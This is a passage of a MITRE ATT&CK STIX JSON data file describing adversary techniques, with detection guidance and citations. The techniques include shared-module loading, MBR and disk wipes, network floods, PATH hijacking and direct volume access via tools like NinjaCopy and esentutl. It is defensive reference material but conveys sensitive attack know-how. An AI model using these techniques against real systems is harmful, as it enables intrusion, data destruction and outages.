objective.\n\nThe Linux & macOS module loader can load and execute shared objects from arbitrary local paths. This functionality resides in `dlfcn.h` in functions such as `dlopen` and `dlsym`. Although macOS can execute `.so` files, common practice uses `.dylib` files.(Citation: Apple Dev Dynamic Libraries)(Citation: Linux Shared Libraries)(Citation: RotaJakiro 2021 netlab360 analysis)(Citation: Unit42 OceanLotus 2017)\n\nThe Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in `NTDLL.dll` and is part of the Windows [Native API](https://attack.mitre.org/techniques/T1106) which is called from functions like `LoadLibrary` at run time.(Citation: Microsoft DLL)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Stefan Kanthak" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitoring DLL module loads may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances, since benign use of Windows modules load functions are common and may be difficult to distinguish from malicious behavior. Legitimate software will likely only need to load routine, bundled DLL modules or Windows system DLLs such that deviation from known module loads may be suspicious. Limiting DLL module loads to `%SystemRoot%` and `%ProgramFiles%` directories will protect against module loads from unsafe paths. \n\nCorrelation of other events with behavior surrounding module loads using API monitoring and suspicious DLLs written to disk will provide additional context to an event that may assist in determining if it is due to malicious behavior.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "macOS", + "Linux" + ], + "x_mitre_version": "2.2", + "x_mitre_data_sources": [], + "x_mitre_remote_support": false, + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--0a5231ec-41af-4a35-83d0-6bdf11f28c65", + "created": "2017-05-31T21:31:40.542Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1129", + "external_id": "T1129" + }, + { + "source_name": "RotaJakiro 2021 netlab360 analysis", + "description": " Alex Turing, Hui Wang. (2021, April 28). RotaJakiro: A long live secret backdoor with 0 VT detection. Retrieved June 14, 2023.", + "url": "https://blog.netlab.360.com/stealth_rotajakiro_backdoor_en/" + }, + { + "source_name": "Apple Dev Dynamic Libraries", + "description": "Apple. (2012, July 23). Overview of Dynamic Libraries. Retrieved September 7, 2023.", + "url": "https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/OverviewOfDynamicLibraries.html" + }, + { + "source_name": "Unit42 OceanLotus 2017", + "description": "Erye Hernandez and Danny Tsechansky. (2017, June 22). The New and Improved macOS Backdoor from OceanLotus. Retrieved September 8, 2023.", + "url": "https://unit42.paloaltonetworks.com/unit42-new-improved-macos-backdoor-oceanlotus/" + }, + { + "source_name": "Microsoft DLL", + "description": "Microsoft. (2023, April 28). What is a DLL. Retrieved September 7, 2023.", + "url": "https://learn.microsoft.com/troubleshoot/windows-client/deployment/dynamic-link-library" + }, + { + "source_name": "Linux Shared Libraries", + "description": "Wheeler, D. (2003, April 11). Shared Libraries. Retrieved September 7, 2023.", + "url": "https://tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Data from Configuration Repository", + "description": "Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.\n\nAdversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.(Citation: US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Identify network traffic sent or received by untrusted hosts or networks that solicits and obtains the configuration information of the queried device.(Citation: Cisco Advisory SNMP v3 Authentication Vulnerabilities)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Network" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--0ad7bc5c-235a-4048-944b-3b286676cb74", + "created": "2020-10-19T23:46:13.931Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1602", + "external_id": "T1602" + }, + { + "source_name": "Cisco Advisory SNMP v3 Authentication Vulnerabilities", + "description": "Cisco. (2008, June 10). Identifying and Mitigating Exploitation of the SNMP Version 3 Authentication Vulnerabilities. Retrieved October 19, 2020.", + "url": "https://tools.cisco.com/security/center/content/CiscoAppliedMitigationBulletin/cisco-amb-20080610-SNMPv3" + }, + { + "source_name": "US-CERT TA17-156A SNMP Abuse 2017", + "description": "US-CERT. (2017, June 5). Reducing the Risk of SNMP Abuse. Retrieved October 19, 2020.", + "url": "https://us-cert.cisa.gov/ncas/alerts/TA17-156A" + }, + { + "source_name": "US-CERT-TA18-106A", + "description": "US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.", + "url": "https://www.us-cert.gov/ncas/alerts/TA18-106A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Disk Structure Wipe", + "description": "Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources. \n\nAdversaries may attempt to render the system unable to boot by overwriting critical data located in structures such as the master boot record (MBR) or partition table.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) The data contained in disk structures may include the initial executable code for loading an operating system or the location of the file system partitions on disk. If this information is not present, the computer will not be able to load an operating system during the boot process, leaving the computer unavailable. [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) may be performed in isolation, or along with [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) if all sectors of a disk are wiped.\n\nOn a network devices, adversaries may reformat the file system using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `format`.(Citation: format_cmd_cisco)\n\nTo maximize impact on the target organization, malware designed for destroying disk structures may have worm-like features to propagate across a network by leveraging other techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Austin Clark, @c2defense" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Look for attempts to read/write to sensitive locations like the master boot record and the disk partition table. Monitor for direct access read/write attempts using the \\\\\\\\.\\\\ notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.\n\nFor network infrastructure devices, collect AAA logging to monitor for `format` commands being run to erase the file structure and prevent recovery of the device.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Network" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_impact_type": [ + "Availability" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--0af0ca99-357d-4ba1-805f-674fdfb7bef9", + "created": "2020-02-20T22:10:20.484Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1561/002", + "external_id": "T1561.002" + }, + { + "source_name": "format_cmd_cisco", + "description": "Cisco. (2022, August 16). format - Cisco IOS Configuration Fundamentals Command Reference. Retrieved July 13, 2022.", + "url": "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/F_through_K.html#wp2829794668" + }, + { + "source_name": "Unit 42 Shamoon3 2018", + "description": "Falcone, R. (2018, December 13). Shamoon 3 Targets Oil and Gas Organization. Retrieved March 14, 2019.", + "url": "https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/" + }, + { + "source_name": "Palo Alto Shamoon Nov 2016", + "description": "Falcone, R.. (2016, November 30). Shamoon 2: Return of the Disttrack Wiper. Retrieved January 11, 2017.", + "url": "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/" + }, + { + "source_name": "FireEye Shamoon Nov 2016", + "description": "FireEye. (2016, November 30). FireEye Responds to Wave of Destructive Cyber Attacks in Gulf Region. Retrieved January 11, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html" + }, + { + "source_name": "Kaspersky StoneDrill 2017", + "description": "Kaspersky Lab. (2017, March 7). From Shamoon to StoneDrill: Wipers attacking Saudi organizations and beyond. Retrieved March 14, 2019.", + "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180722/Report_Shamoon_StoneDrill_final.pdf" + }, + { + "source_name": "Microsoft Sysmon v6 May 2017", + "description": "Russinovich, M. & Garnier, T. (2017, May 22). Sysmon v6.20. Retrieved December 13, 2017.", + "url": "https://docs.microsoft.com/sysinternals/downloads/sysmon" + }, + { + "source_name": "Symantec Shamoon 2012", + "description": "Symantec. (2012, August 16). The Shamoon Attacks. Retrieved March 14, 2019.", + "url": "https://www.symantec.com/connect/blogs/shamoon-attacks" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Direct Network Flood", + "description": "Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. This DoS attack may also reduce the availability and functionality of the targeted system(s) and network. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001)s are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.\n\nBotnets are commonly used to conduct network flooding attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global Internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for distributed DoS (DDoS), so many systems are used to generate the flood that each one only needs to send out a small amount of traffic to produce enough volume to saturate the target network. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS flooding attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Detection of a network flood can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness or services provided by an upstream network service provider. Typical network throughput monitoring tools such as netflow(Citation: Cisco DoSdetectNetflow), SNMP, and custom scripts can be used to detect sudden increases in network or service utilization. Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect a network flood event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Azure AD", + "Office 365", + "SaaS", + "IaaS", + "Linux", + "macOS", + "Google Workspace" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [], + "x_mitre_impact_type": [ + "Availability" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--0bda01d5-4c1d-4062-8ee2-6872334383c3", + "created": "2020-03-02T20:07:18.651Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1498/001", + "external_id": "T1498.001" + }, + { + "source_name": "Cisco DoSdetectNetflow", + "description": "Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow. Retrieved April 25, 2019.", + "url": "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf" + }, + { + "source_name": "USNYAG IranianBotnet March 2016", + "description": "Preet Bharara, US Attorney. (2016, March 24). Retrieved April 23, 2019.", + "url": "https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Stored Data Manipulation", + "description": "Adversaries may insert, delete, or manipulate data at rest in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making. \n\nStored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Where applicable, inspect important file hashes, locations, and modifications for suspicious/unexpected values.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_impact_type": [ + "Integrity" + ], + "x_mitre_permissions_required": [ + "User", + "Administrator", + "root", + "SYSTEM" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--0bf78622-e8d2-41da-a857-731472d61a92", + "created": "2019-04-09T11:51:30.942Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1492", + "external_id": "T1492" + }, + { + "source_name": "FireEye APT38 Oct 2018", + "description": "FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018.", + "url": "https://content.fireeye.com/apt/rpt-apt38" + }, + { + "source_name": "DOJ Lazarus Sony 2018", + "description": "Department of Justice. (2018, September 6). Criminal Complaint - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.", + "url": "https://www.justice.gov/opa/press-release/file/1092091/download" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-03T03:29:57.078Z", + "name": "Path Interception by PATH Environment Variable", + "description": "Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. The PATH environment variable contains a list of directories (User and System) that the OS searches sequentially through in search of the binary that was called from a script or the command line. \n\nAdversaries can place a malicious program in an earlier entry in the list of directories stored in the PATH environment variable, resulting in the operating system executing the malicious binary rather than the legitimate binary when it searches sequentially through that PATH listing.\n\nFor example, on Windows if an adversary places a malicious program named \"net.exe\" in `C:\\example path`, which by default precedes `C:\\Windows\\system32\\net.exe` in the PATH environment variable, when \"net\" is executed from the command-line the `C:\\example path` will be called instead of the system's legitimate executable at `C:\\Windows\\system32\\net.exe`. Some methods of executing a program rely on the PATH environment variable to determine the locations that are searched when the path for the program is not given, such as executing programs from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: ExpressVPN PATH env Windows 2021)\n\nAdversaries may also directly modify the $PATH variable specifying the directories to be searched. An adversary can modify the `$PATH` variable to point to a directory they have write access. When a program using the $PATH variable is called, the OS searches the specified directory and executes the malicious binary. On macOS, this can also be performed through modifying the $HOME variable. These variables can be modified using the command-line, launchctl, [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004), or modifying the `/etc/paths.d` folder contents.(Citation: uptycs Fake POC linux malware 2023)(Citation: nixCraft macOS PATH variables)(Citation: Elastic Rules macOS launchctl 2022)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Stefan Kanthak" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as \"findstr,\" \"net,\" and \"python\"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.\n\nData and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "macOS", + "Linux" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Application Control" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32", + "created": "2020-03-13T14:10:43.424Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1574/007", + "external_id": "T1574.007" + }, + { + "source_name": "Elastic Rules macOS launchctl 2022", + "description": "Elastic Security 7.17. (2022, February 1). Modification of Environment Variable via Launchctl. Retrieved September 28, 2023.", + "url": "https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-7-16-4-modification-of-environment-variable-via-launchctl.html" + }, + { + "source_name": "ExpressVPN PATH env Windows 2021", + "description": "ExpressVPN Security Team. (2021, November 16). Cybersecurity lessons: A PATH vulnerability in Windows. Retrieved September 28, 2023.", + "url": "https://www.expressvpn.com/blog/cybersecurity-lessons-a-path-vulnerability-in-windows/" + }, + { + "source_name": "uptycs Fake POC linux malware 2023", + "description": "Nischay Hegde and Siddartha Malladi. (2023, July 12). PoC Exploit: Fake Proof of Concept with Backdoor Malware. Retrieved September 28, 2023.", + "url": "https://www.uptycs.com/blog/new-poc-exploit-backdoor-malware" + }, + { + "source_name": "nixCraft macOS PATH variables", + "description": "Vivek Gite. (2023, August 22). MacOS – Set / Change $PATH Variable Command. Retrieved September 28, 2023.", + "url": "https://www.cyberciti.biz/faq/appleosx-bash-unix-change-set-path-environment-variable/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Sharepoint", + "description": "Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:\n\n* Policies, procedures, and standards\n* Physical / logical network diagrams\n* System architecture diagrams\n* Technical system documentation\n* Testing / development credentials\n* Work / project schedules\n* Source code snippets\n* Links to network shares and other internal resources\n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "The user access logging within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging). As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies. \n\n", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Office 365" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a", + "created": "2020-02-14T13:35:32.938Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1213/002", + "external_id": "T1213.002" + }, + { + "source_name": "Microsoft SharePoint Logging", + "description": "Microsoft. (2017, July 19). Configure audit settings for a site collection. Retrieved April 4, 2018.", + "url": "https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-16T12:25:24.480Z", + "name": "Direct Volume Access", + "description": "Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique may bypass Windows file access controls as well as file system monitoring tools. (Citation: Hakobyan 2009)\n\nUtilities, such as `NinjaCopy`, exist to perform these actions in PowerShell.(Citation: Github PowerSploit Ninjacopy) Adversaries may also use built-in or third-party utilities (such as `vssadmin`, `wbadmin`, and [esentutl](https://attack.mitre.org/software/S0404)) to create shadow copies or backups of data from system volumes.(Citation: LOLBAS Esentutl)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Tom Simpson, CrowdStrike Falcon OverWatch" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor handle opens on drive volumes that are made by processes to determine when they may directly access logical drives. (Citation: Github PowerSploit Ninjacopy)\n\nMonitor processes and command-line arguments for actions that could be taken to copy files from the logical drive and evade common file system protections. Since this technique may also be used through [PowerShell](https://attack.mitre.org/techniques/T1059/001), additional logging of PowerShell scripts is recommended.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Network" + ], + "x_mitre_version": "2.2", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "File monitoring", + "File system access controls" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--0c8ab3eb-df48-4b9c-ace7-beacaac81cc5", + "created": "2017-05-31T21:30:20.934Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1006", + "external_id": "T1006" + }, + { + "source_name": "Github PowerSploit Ninjacopy", + "description": "Bialek, J. (2015, December 16). Invoke-NinjaCopy.ps1. Retrieved June 2, 2016.", + "url": "https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1" + }, + { + "source_name": "Hakobyan 2009", + "description": "Hakobyan, A. (2009, January 8). FDump - Dumping File Sectors Directly from Disk using Logical Offsets. Retrieved November 12, 2014.", + "url": "http://www.codeproject.com/Articles/32169/FDump-Dumping-File-Sectors-Directly-from-Disk-usin" + }, + { + "source_name": "LOLBAS Esentutl", + "description": "LOLBAS. (n.d.). Esentutl.exe. Retrieved September 3, 2019.", + "url": "https://lolbas-project.github.io/lolbas/Binaries/Esentutl/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "File System Permissions Weakness", + "description": "Processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.\n\nAdversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.\n\n### Services\n\nManipulation of Windows service binaries is one variation of this technique. Adversaries may replace a legitimate service executable with their own executable to gain persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService). Once the service is started, either directly by the user (if appropriate access is available) or through some other means, such as a system restart if the service starts on bootup, the replaced executable will run instead of the original service executable.\n\n### Executable Installers\n\nAnother variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the %TEMP% directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038). Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1088). Several examples of this weakness in existing common installers have been reported to software vendors. (Citation: Mozilla Firefox Installer DLL Hijack) (Citation: Seclists Kanthak 7zip Installer)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Stefan Kanthak", + "Travis Smith, Tripwire" + ], + "x_mitre_detection": "Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.\n\nLook for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Linux", + "macOS" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_effective_permissions": [ + "SYSTEM", + "User", + "Administrator" + ], + "x_mitre_permissions_required": [ + "Administrator", + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--0ca7beef-9bbc-4e35-97cf-437384ddce6a", + "created": "2017-05-31T21:30:43.063Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1044", + "external_id": "T1044" + }, + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/17.html", + "external_id": "CAPEC-17" + }, + { + "source_name": "Mozilla Firefox Installer DLL Hijack", + "description": "Kugler, R. (2012, November 20). Mozilla Foundation Security Advisory 2012-98. Retrieved March 10, 2017.", + "url": "https://www.mozilla.org/en-US/security/advisories/mfsa2012-98/" + }, + { + "source_name": "Seclists Kanthak 7zip Installer", + "description": "Kanthak, S. (2015, December 8). Executable installers are vulnerable^WEVIL (case 7): 7z*.exe\tallows remote code execution with escalation of privilege. Retrieved March 10, 2017.", + "url": "http://seclists.org/fulldisclosure/2015/Dec/34" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-15T23:49:14.558Z", + "name": "Artificial Intelligence", + "description": "Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be used to inform, bolster, and enable a variety of 